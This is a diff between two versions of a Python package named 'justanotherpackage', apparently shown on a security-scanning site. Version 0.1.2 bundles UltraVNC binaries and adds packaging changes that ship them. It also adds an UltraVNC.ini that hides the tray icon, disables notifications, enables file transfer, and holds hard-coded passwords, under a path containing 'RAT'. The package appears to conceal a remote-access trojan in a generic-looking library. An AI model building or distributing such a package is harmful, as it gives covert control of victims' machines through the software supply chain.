justanotherpackage 0.1.1__tar.gz → 0.1.2__tar.gz

Sign up to get free protection for your applications and to get access to all the features.
Files changed (20) hide show
  1. justanotherpackage-0.1.2/MANIFEST.in +1 -0
  2. {justanotherpackage-0.1.1 → justanotherpackage-0.1.2}/PKG-INFO +1 -1
  3. justanotherpackage-0.1.2/justanotherpackage/remote/SecureVNCPlugin.dsm +0 -0
  4. justanotherpackage-0.1.2/justanotherpackage/remote/UVncVirtualDisplay/UVncVirtualDisplay.dll +0 -0
  5. justanotherpackage-0.1.2/justanotherpackage/remote/UVncVirtualDisplay/UVncVirtualDisplay.inf +0 -0
  6. justanotherpackage-0.1.2/justanotherpackage/remote/UVncVirtualDisplay/uvncvirtualdisplay.cat +0 -0
  7. justanotherpackage-0.1.2/justanotherpackage/remote/UltraVNC.ini +83 -0
  8. justanotherpackage-0.1.2/justanotherpackage/remote/ddengine.dll +0 -0
  9. justanotherpackage-0.1.2/justanotherpackage/remote/logging.dll +0 -0
  10. justanotherpackage-0.1.2/justanotherpackage/remote/vnchooks.dll +0 -0
  11. justanotherpackage-0.1.2/justanotherpackage/remote/winvnc.exe +0 -0
  12. {justanotherpackage-0.1.1 → justanotherpackage-0.1.2}/justanotherpackage.egg-info/PKG-INFO +1 -1
  13. justanotherpackage-0.1.2/justanotherpackage.egg-info/SOURCES.txt +17 -0
  14. {justanotherpackage-0.1.1 → justanotherpackage-0.1.2}/setup.py +2 -1
  15. justanotherpackage-0.1.1/justanotherpackage.egg-info/SOURCES.txt +0 -7
  16. {justanotherpackage-0.1.1 → justanotherpackage-0.1.2}/justanotherpackage/__init__.py +0 -0
  17. {justanotherpackage-0.1.1 → justanotherpackage-0.1.2}/justanotherpackage/core.py +0 -0
  18. {justanotherpackage-0.1.1 → justanotherpackage-0.1.2}/justanotherpackage.egg-info/dependency_links.txt +0 -0
  19. {justanotherpackage-0.1.1 → justanotherpackage-0.1.2}/justanotherpackage.egg-info/top_level.txt +0 -0
  20. {justanotherpackage-0.1.1 → justanotherpackage-0.1.2}/setup.cfg +0 -0
@@ -0,0 +1 @@
1
+ recursive-include justanotherpackage/remote *
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.1
2
2
  Name: justanotherpackage
3
- Version: 0.1.1
3
+ Version: 0.1.2
4
4
  Summary: UNKNOWN
5
5
  Home-page: UNKNOWN
6
6
  License: UNKNOWN
@@ -0,0 +1,83 @@
1
+ [Permissions]
2
+ [admin]
3
+ FileTransferEnabled=1
4
+ FTUserImpersonation=1
5
+ BlankMonitorEnabled=1
6
+ BlankInputsOnly=0
7
+ DefaultScale=1
8
+ UseDSMPlugin=0
9
+ DSMPlugin=
10
+ primary=1
11
+ secondary=0
12
+ SocketConnect=1
13
+ HTTPConnect=1
14
+ AutoPortSelect=1
15
+ InputsEnabled=1
16
+ LocalInputsDisabled=0
17
+ IdleTimeout=0
18
+ EnableJapInput=0
19
+ EnableUnicodeInput=0
20
+ EnableWin8Helper=0
21
+ QuerySetting=2
22
+ QueryTimeout=10
23
+ QueryDisableTime=0
24
+ QueryAccept=0
25
+ MaxViewerSetting=0
26
+ MaxViewers=128
27
+ Collabo=0
28
+ Frame=0
29
+ Notification=0
30
+ OSD=0
31
+ NotificationSelection=1
32
+ LockSetting=0
33
+ RemoveWallpaper=0
34
+ RemoveEffects=0
35
+ RemoveFontSmoothing=0
36
+ DebugMode=0
37
+ Avilog=0
38
+ path=D:\MY PROGRAMS\RAT\remote
39
+ DebugLevel=0
40
+ AllowLoopback=1
41
+ LoopbackOnly=0
42
+ AllowShutdown=1
43
+ AllowProperties=1
44
+ AllowInjection=0
45
+ AllowEditClients=1
46
+ FileTransferTimeout=30
47
+ KeepAliveInterval=5
48
+ IdleInputTimeout=0
49
+ DisableTrayIcon=1
50
+ rdpmode=0
51
+ noscreensaver=0
52
+ Secure=0
53
+ MSLogonRequired=0
54
+ NewMSLogon=0
55
+ ReverseAuthRequired=1
56
+ ConnectPriority=1
57
+ service_commandline=
58
+ accept_reject_mesg=
59
+ cloudServer=
60
+ cloudEnabled=0
61
+ [UltraVNC]
62
+ passwd=FF1887AB0F367B8E97
63
+ passwd2=84805F25C0A3D34C0A
64
+ [poll]
65
+ TurboMode=1
66
+ PollUnderCursor=0
67
+ PollForeground=0
68
+ PollFullScreen=1
69
+ OnlyPollConsole=0
70
+ OnlyPollOnEvent=0
71
+ MaxCpu2=100
72
+ MaxFPS=25
73
+ EnableDriver=1
74
+ EnableHook=1
75
+ EnableVirtual=0
76
+ autocapt=1
77
+ [admin_auth]
78
+ group1=VNCACCESS
79
+ group2=Administrators
80
+ group3=VNCVIEWONLY
81
+ locdom1=0
82
+ locdom2=0
83
+ locdom3=0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.1
2
2
  Name: justanotherpackage
3
- Version: 0.1.1
3
+ Version: 0.1.2
4
4
  Summary: UNKNOWN
5
5
  Home-page: UNKNOWN
6
6
  License: UNKNOWN
@@ -0,0 +1,17 @@
1
+ MANIFEST.in
2
+ setup.py
3
+ justanotherpackage/__init__.py
4
+ justanotherpackage/core.py
5
+ justanotherpackage.egg-info/PKG-INFO
6
+ justanotherpackage.egg-info/SOURCES.txt
7
+ justanotherpackage.egg-info/dependency_links.txt
8
+ justanotherpackage.egg-info/top_level.txt
9
+ justanotherpackage/remote/SecureVNCPlugin.dsm
10
+ justanotherpackage/remote/UltraVNC.ini
11
+ justanotherpackage/remote/ddengine.dll
12
+ justanotherpackage/remote/logging.dll
13
+ justanotherpackage/remote/vnchooks.dll
14
+ justanotherpackage/remote/winvnc.exe
15
+ justanotherpackage/remote/UVncVirtualDisplay/UVncVirtualDisplay.dll
16
+ justanotherpackage/remote/UVncVirtualDisplay/UVncVirtualDisplay.inf
17
+ justanotherpackage/remote/UVncVirtualDisplay/uvncvirtualdisplay.cat
@@ -2,7 +2,8 @@ from setuptools import setup, find_packages
2
2
 
3
3
  setup(
4
4
  name="justanotherpackage",
5
- version="0.1.1",
5
+ version="0.1.2",
6
6
  packages=find_packages(),
7
7
  python_requires=">=3.6",
8
+ include_package_data=True,
8
9
  )
@@ -1,7 +0,0 @@
1
- setup.py
2
- justanotherpackage/__init__.py
3
- justanotherpackage/core.py
4
- justanotherpackage.egg-info/PKG-INFO
5
- justanotherpackage.egg-info/SOURCES.txt
6
- justanotherpackage.egg-info/dependency_links.txt
7
- justanotherpackage.egg-info/top_level.txt